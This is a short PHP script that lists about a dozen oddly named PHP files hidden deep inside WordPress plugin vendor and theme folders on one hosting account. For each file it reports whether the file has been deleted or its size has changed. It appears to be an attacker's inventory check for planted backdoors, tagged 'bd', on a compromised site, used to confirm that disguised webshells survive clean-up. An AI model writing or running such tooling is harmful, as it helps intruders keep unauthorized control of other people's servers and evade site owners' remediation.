<?php   $r = '/home/ecosprin/public_html'; $x = ["/ecospringfieldd2/wp-content/plugins/wpforms/vendor_prefixed/box/spout/src/Spout/Reader/ODS/Manager/ipn_main_handler.php"=>"bd@@488977@@974",
"/ecospringfieldd2/wp-content/plugins/wpforms/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/view_email.php"=>"bd@@1660961@@868",
"/ecospringfieldd/wp-content/themes/author-template-1781913855/assets/js/archives-1781913855.php"=>"bd@@488488@@646",
"/ecospringfieldd2/wp-content/plugins/wpforms/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/AttrTransform/display_tbl.lib.php"=>"bd@@844855@@895",
"/ecospringfieldd2/wp-content/plugins/wpforms/vendor_prefixed/box/spout/src/Spout/Writer/Common/Creator/KVForm.php"=>"bd@@485981@@928",
"/ecospringfieldd2/wp-content/plugins/wpforms/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/AttrDef/URI/masterFee.php"=>"bd@@485999@@903",
"/ecospringfieldd2/wp-content/plugins/wpforms/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/Language/messages/Alias.php"=>"bd@@1919626@@887",
"/ecospringfieldd2/wp-content/plugins/wpforms/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/URIScheme/function.sitemap.php"=>"bd@@1919628@@917",
"/mc/wp-content/plugins/wdt-demo-importer/unyson/framework/core/components/extensions/manager/includes/download-source/class.fw.ext.download.source.register.php"=>"bd@@1918396@@1054",
"/ecospringfieldd2/wp-content/plugins/wpforms/vendor_prefixed/box/spout/src/Spout/Writer/CSV/diyconf.ini.php"=>"bd@@1918399@@866",
"/ecospringfieldd2/wp-content/plugins/wpforms/src/Integrations/Square/Admin/Builder/Traits/db_routines.inc.php"=>"bd@@1918401@@916",
"/ecospringfieldd/wp-content/themes/config_1781871277/includes/custom-file-4-1781871277.php"=>"bd@@485844@@716",
"/ecospringfieldd/wp-content/themes/page_template_1781871276/template-parts/search_template_1781871276.php"=>"bd@@485354@@857"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 